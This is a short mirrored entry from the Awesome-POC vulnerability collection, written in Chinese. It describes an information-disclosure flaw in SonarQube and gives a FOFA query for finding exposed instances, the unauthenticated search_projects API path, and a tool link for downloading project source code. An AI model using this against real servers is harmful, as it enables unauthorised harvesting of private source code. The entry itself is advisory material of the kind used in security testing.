admin/Awesome-POC

mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00

Threekiii cba0c4db58 更新漏洞

2022-12-05 11:09:28 +08:00

545 B

Raw Blame History

SonarQube search_projects 项目信息泄露漏洞

漏洞描述

SonarQube 某接口存在信息泄露漏洞，可以通过工具下载源码

漏洞影响

SonarQube

FOFA

app="sonarQube-代码管理"

漏洞复现

主页如下

漏洞POC

http://xxx.xxx.xxx.xxx/api/components/search_projects

可通过工具下载项目中的源代码

https://github.com/deletescape/sloot